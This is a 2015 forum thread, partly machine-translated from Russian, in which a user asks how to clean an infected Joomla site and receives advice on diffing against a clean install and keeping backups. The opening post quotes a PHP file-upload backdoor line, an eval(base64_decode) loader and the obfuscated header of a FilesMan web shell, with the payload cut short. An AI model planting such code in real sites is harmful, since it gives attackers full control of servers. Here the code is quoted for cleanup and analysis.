Site infection, what to do next?

A

Anton2015-03-30 14:02:43

Malware

Anton, 2015-03-30 14:02:43

A friend asked me to help clean up an infected site. I downloaded, studied, and what I saw in the end .....

15 thousand files. Ok, let's check with an antivirus:

several dozen files are infected. I started to discover and explore. Confused by this line in index.php:

if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}

This means that a hacker can upload files remotely. I was also confused by a file called cron.php. What can be crowns on a business card site? The cron.php file was NOT detected as infected by the antivirus. But I decided to explore it. Now the most interesting:
eval(base64_decode("Ly83MTg3O...MTg3O");
That was the content of the crown. Launched, received:

$auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9Vc...uA='\x29\x29\x29\x3B",".");

When I launched it, I saw the following interface in the browser... with all the ins and outs of the sarvak:

Through this interface, you can do anything with the server's file system.
The question arose: how to cure the site?
1. Hire a monkey who will check all 15 thousand files and remove all viruses (because the antivirus itself cannot extract the virus from the base64_decode) - this is probably expensive. 2. roll back to a backup
, preferably six months ago (this option was suggested by a friend, I doubt it myself, but what if the site was infected six months ago, anything can happen)
.htacsses, lock ftp access, etc. (I suggested this option, because I myself have already done it, and it rolled)
I myself had previously tried all 3 options when fiddling with my infected sites. In the end, only the third option helped.
What do you recommend? Mb are there any other options? Or are there any additions to the options I suggested?

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

A

Anton, 2015-04-14
@fattan

Резюмирую:
Хостинг был Спайсвеб (sweb.ru). Бэкапы у них хранятся за последние пять дней максимум (!!!). Техподдержка молчит. Сказка!
Сайт был на джумле 2.1 (или что-то типа того).
Я ручками перенес материалы из базы джумлы 2.1 в Joomla! 3.4.1. (для 10ти страниц сайта-визитки это оказалось быстрее чем если бы я возился с их migrate-системой)
...А потом психанул и переписал сайт с нуля на modx evolution (он у меня в любимчиках).
Естественно, сменил хостера.
В процессе работы заглянул ради интереса в скрипты Joomla! 3.4.1 и скрипты самого свежего modx evolution (1.13 вроде)
and .... was surprised! In Joomla, all the features of php 5.4 have been used for a long time - class autoloading using namespaces, familiar fields in classes ... and two-factor authentication out of the box and much more. (I'll stay on modx evo because you can quickly and flexibly configure everything)
But the developers of my favorite modx, it seems, are still running around with spears in mammoth skins. This is due to the main focus on the REVO branch (I thought), so EVO is slowly developing.
CONCLUSIONS:
1. Do not use Spiceweb. Never ever.
2. Don't use Joomla. Old joomla.
3. Don't be afraid of the new Joomla.

S

SanyaZol, 2015-05-14
@SanyaZol

If there are no backups, but it is necessary to treat, then the recipe is something like this:
- We take a clean CMS of the same version and do a diff. all files will be different because of this code.
- We analyze the changes made by the virus to all files. Most likely, they can be corrected with a simple php script - we correct, and we try to bring the files back to their original form.
Next, we do a diff with a clean CMS (in ignore whitespace mode if the changes show a bunch of spaces due to inaccurate treatment) and decide what to do with the remaining "unsynchronized" files: clean with pens or write a script or something.
- do not forget to check the base. a lot of interesting things could also remain there
- when everything is cleared - we make a backup, we update everything, we make a backup again.

V

Vladimir Martyanov, 2015-03-30
@vilgeforce

Backups should be incremental, with good history retention. Using them, you can easily track when the file has changed and in what way.
No automatic treatment will give a guarantee, keep that in mind.